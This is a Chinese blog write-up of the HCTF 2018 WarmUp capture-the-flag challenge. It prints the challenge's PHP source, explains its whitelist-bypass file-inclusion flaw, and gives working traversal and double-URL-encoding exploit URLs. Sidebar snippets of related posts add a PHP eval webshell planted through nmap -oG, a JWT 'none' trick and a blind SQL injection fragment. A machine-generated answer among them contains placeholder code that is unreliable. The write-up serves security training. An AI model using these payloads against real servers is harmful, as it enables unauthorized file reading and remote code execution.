一天一道CTF(第一天)

最新推荐文章于 2022-03-12 14:02:03 发布
最新推荐文章于 2022-03-12 14:02:03 发布
阅读量295 收藏
点赞数 2
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/scrawman/article/details/114240055
本文详细解析了HCTF2018 WarmUp题目,通过PHP代码审计找到flag所在,利用文件包含漏洞及URL构造技巧成功获取到flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

从今天开始每天做一道buu上的web题,写博客是为了记下来防止自己以后忘了和督促自己。(不知道哪天能全部做完)

[HCTF 2018]WarmUp
从提示来看这是一道php代码审计题,其实我php只学了一点皮毛,只能摸着石头过河了。网页点开是一张滑稽的图片,右键查看源代码没有什么玄机,估计flag是藏在source.php里。(<!--source.php-->是注释该文件的意思。)
在这里插入图片描述
在有滑稽的网页的URL后添加/source.php查看代码

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];  #申明白名单
            if (! isset($page) || !is_string($page)) {   #判断page变量是否存在并且是否是字符串
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {   #in_array函数在第二个参数(数组)里找第一个参数是否存在
                return true;
            }

            $_page = mb_substr(  #mb_substr从字符串中提取子串,第一个参数是被提取的字符串,第二个参数是开始位置,第三个参数是提取字符串的长度
                $page,
                0,
                mb_strpos($page . '?', '?') mb_strpos查找后一个字符串在第一个字符串首次出现的位置
            ); #这个步骤就是截取page中第一个?前的内容
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page); #urldecode函数是把经过urlencode的字符串转换回来
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    } #checkfile函数要求参数以某种形式(三种可选)包含白名单里的内容
    
    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file']; #这里有一个文件包含漏洞
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

白名单里有一个hint.php文件,先尝试包含该文件,在原链接后加上?file=hint.php,显示flag not here, and flag in ffffllllaaaagggg。要相信用滑稽图片的都不是坏人,这应该就是正确提示。那么我们就要绕过emmm::checkFile($_REQUEST['file']),让它返回true。最简单的就是用它的?截断机制,构造URL后缀为?file=source.php?../../../ffffllllaaaagggg,这里的…/数量不确定,可以多试几次。最后成功的URL是http://a2df1a09-e1e2-46d4-a468-b95cf4459445.node3.buuoj.cn/?file=source.php?../../../../../ffffllllaaaagggg

也可以构造URL是http://1c797915-11af-459e-9a50-955b3dc3216b.node3.buuoj.cn/?file=source.php%253f../../../../../ffffllllaaaagggg,本身浏览器会做一次解码,checkfile函数又做了一次解码,%253f两次解码以后就是?

提交flag的时候要连flag{}一起提交,第一次做不知道啊(扶额

scrawman
关注
一天一道ctf 第55天(controllers/api.js JWT)
scrawman的博客
08-18 444
审查元素发现是js框架且有app.js文件: 看了wp才知道要访问controllers/api.js,行吧就当积累经验了。 重点是这里: const token = jwt.sign({secretid, username, password}, secret, {algorithm: 'HS256'}); jwt之前也遇到过了,我们可以抓包一个jwt然后解密出secret。注册一个账号然后登录,拿到令牌。 在https://jwt.io/这个网站上可以解析jwt 把加密方法改为none,us
一天一道ctf 第34天(NMAP)
scrawman的博客
07-16 230
[网鼎杯 2020 朱雀组]Nmap 这题和之前有一道Online Tool很像,都是操纵NMAP。参数-oG会将结果存放到hack.php文件里 ' <?php @eval($_POST["hack"]);?> -oG hack.php ' 结果页面回显给我们一个Hacker…,看来是有什么被过滤了。测试下来是php被过滤了,换成标签phtml就可以了(注意两边两个单引号是要的) ' <?= @eval($_POST["hack"]);?> -oG hack.phtml '
[HCTF 2018]WarmUp
sGanYu
08-24 1569
方法一:打开靶场后,按f12查看源码即可看到<!--source.php-->,根据提示修改URL访问source.php 方法二:利用dirsearch对IP进行目录扫描,同样扫描出目录下的source.php 打开source.php页面,已知信息如下 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$pag..
查看php源文件,source.php查看源文件
weixin_35348899的博客
03-11 1063
source.php查看源文件更新时间:2006年12月09日 00:00:00 作者:/***ShowSource**@authorAvenger*@version$Id2003-07-109:09:03$*/require_once'header.inc.php';tpl_load('left.tpl');//Checkurlvalueif(!isset...
CTF刷题02
Atkx's Blog
09-27 1226
掀桌子 题目描述:菜狗截获了一份报文如下c8e9aca0c6f2e5f3e8c4efe7a1a0d4e8e5a0e6ece1e7a0e9f3baa0e8eafae3f9e4eafae2eae4e3eaebfaebe3f5e7e9f3e4e3e8eaf9eaf3e2e4e6f2,生气地掀翻了桌子(╯°□°)╯︵ ┻━┻ 分析这一串字符串,发现由a-z的字母和数字组合而成,我们将字符串整理一下,可以看出是16进制数,其中一组十六进制数fa转化为十进制数是250,所以将每组十六进制数转化为十进制后再减去128
BUUCTF [HCTF 2018]WarmUp
m0_63253040的博客
03-12 2198
打开环境是一个滑稽 查看源代码,提示source.php 打开source.phpphp代码 <?php highlight_file(__FILE__); #意思是定义一个emmm class emmm { #在emmm里定义变量page,使用checkfile函数 public static function checkFile(&$page) { #变量whitelist是个数组,有source.php和hin.
XCTF-攻防世界CTF平台-Web类——6、warmup(php中include函数遍历漏洞)
Onlyone_1314的博客
11-15 1724
打开题目地址: 标题栏是Document,只有一张图片,所以我们审计源代码: 有一个source.php打开: 有一段判断页面的代码,还有一个hint.php 提示flag在ffffllllaaaagggg中,应该是另一个文件中,直接访问ffffllllaaaagggg文件是不存在的: 所以我们继续看source.php中的代码: <?php highlight_file(__FILE__); class emmm { public static fu
一天一道ctf 第42天(php解析字符串特性)
scrawman的博客
07-23 460
[MRCTF2020]套娃 进去啥也没有,先看一下源码,发现第一关 $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_
一天一道ctf 第45天(php伪随机)
scrawman的博客
07-29 709
[GWCTF 2019]枯燥的抽奖 查看源码发现check.php,直接访问获得题目代码 2vRheEpPK8 <?php #这不是抽奖程序的源代码!不许看! header("Content-Type: text/html;charset=utf-8"); session_start(); if(!isset($_SESSION['seed'])){ $_SESSION['seed']=rand(0,999999999); } mt_srand($_SESSION['seed']); $str_l
一天一道ctf 第56天(ascii偏移盲注)
scrawman的博客
08-18 601
[GYCTF2020]Ezsqli 先用二分法写一个脚本查一下表名,二分法快是快,但就是容易出错,用sleep延缓一下请求速度会好一些。or被过滤了所以informaiton.schema用不了,换成sys.x$schema_flattened_keys。 import requests import time url = "http://7630a861-14ab-4171-bfd2-dff39c2434b9.node4.buuoj.cn:81/" flag = "" payload = "1^(a
phpsource,PHPsource #N问题的解决方法
weixin_42299396的博客
03-21 460
最近写PHP里面的查询经常会遇到source #4或者source#5这样的问题,也就是通过mysql_query($sql1)进行一段查询的操作,返回的结果不是想要的字段而是source,去网上查了一些资料都说是什么‘资源'的问题,虽然对于出现这种情况的原理还是不甚了解,但是解决方案是有了,下面是解决这个问题的代码:复制代码 代码如下:$result2 = mysql_query("SELECT...
CTF之warmup-文件包含
wcwdnmdnmd的博客
12-24 1214
CTF练习之warmup-文件包含初见 初见 打开以后就见到这样的页面直接F12看源代码 看到<!--source.php-->直接访问 看到白名单有两个地址,访问另一个hint.php 看到ffffllllaaaagggg 再分析source.php的代码 发现$_page处mb_strops($page . '?', '?')有点奇怪,查看函数定义。 发现该函数可被利用 https://www.cnblogs.com/leixiao-/p/10265150.html 知道该函
php showsource,showsource.php
weixin_42172972的博客
03-13 383
$cache_time=10;$OJ_CACHE_SHARE=false;require_once('./include/cache_start.php');require_once('./include/db_info.inc.php');require_once('./include/setlang.php');$view_title= "Source Code";require_once("...
攻防世界web解题[进阶](二)
weixin_46703850的博客
03-05 872
攻防世界web解题[进阶](二)
BUUCTF WEB 菜比的做题总结
不会CTF的博客
07-11 1187
目录前言:BUUCTF web WarmUp[强网杯 2019]随便注1.mysql 预处理语句 然后加 char ascii码绕过过滤2.同样是mysql预处理 但是用的是十六进制的方式 payload比第一个师傅要简单3.这个师傅的姿势是最骚的,也是比较容易读懂的 前言: 学了这么久的web基础,发现做题和看知识还是有很大区别,基础越扎实 web就越得心应手,各种师傅的姿势实在太多了!学习!! BUUCTF web WarmUp 一天一道CTF题目,冲!!!! F12 ------------》 so
HCTF 2018:WarmUp(源代码详解)
1stPeak's Blog
03-06 2990
前言 之前刷BUUCTF时遇到过这题,这次刷XCTF时也遇到了,那就写个详细点的WP吧 寻找利用点 打开题目,是一个滑稽图 没发现什么,查看下网页源代码,发现了source.php 访问source.php,发现以下source.php中的代码,经测试,这是index.php的源代码 <?php highlight_file(__FILE__); class emmm ...
CTF 中的 PHP 漏洞利用总结
热门推荐
重新启程
10-12 2万+
基础知识 系统变量(超全局变量) 在全部作用域中始终可用的内置变量 1 2 3 4 5 6 7 8 9 $GLOBALS // 引用全局作用域中可用的全部变量 $_POST // 获取 post 数据,是一个字典 $_GET // 获取 get 数据,是一个字典 $_COOKIE // 获取 cookie $_SESSION // 获取 session $...
ctf php代码审计 绕过,CTF代码审计之[HCTF 2018]WarmUp
weixin_32019577的博客
04-11 718
[HCTF 2018]WarmUp{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) {echo "you can't see it";return f...
hellp ctf的第一关
最新发布
01-31
### 关于CTF比赛第一关的帮助 对于参与CTF(夺旗赛)的新手而言,理解并完成首个挑战至关重要。通常情况下,CTF竞赛中的第一个挑战旨在帮助参赛者熟悉环境以及基本操作流程。 #### 下载与准备 为了获取用于练习的虚拟机镜像文件,可以访问提供的下载链接[^1]。这一步骤确保拥有一个安全隔离的比赛环境,在此环境中进行各种尝试而无需担心影响个人设备的安全性。 #### 容器化设置 考虑到所有挑战都应被容器化处理以便更好地管理和部署,建议参照相关指南来配置Dockerfile以支持CTF题目运行环境[^2]。通过这种方式,不仅能够简化开发过程,还能提高资源利用率和安全性。 针对具体的第一关解法,则取决于该关卡的设计目的和技术要点。如果涉及图像上传功能,并且最终目标是从给定条件求解两个未知数p,q的话,那么可能需要利用线性代数知识解决此类问题[^3]: 假设存在一张尺寸为600x600像素的照片作为输入数据源,通过对图片特征分析提取有效信息建立方程组进而得出答案。实际操作过程中可能会涉及到逆向工程、密码学基础等方面的内容。 ```python from sympy import symbols, Eq, solve # Define the symbols/variables p and q p, q = symbols('p q') # Assuming we got these values from analyzing an uploaded picture or other clues provided within the challenge. equation_1 = Eq(2*p + 3*q, some_value_from_challenge) equation_2 = Eq(p - q, another_value) solution = solve((equation_1,equation_2), (p, q)) print(f"The solutions are {solution}") ``` 上述代码片段展示了如何基于已知条件构建并求解二元一次方程的方法之一;当然实际情况会更加复杂多变,因此鼓励选手们积极思考探索更多可能性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值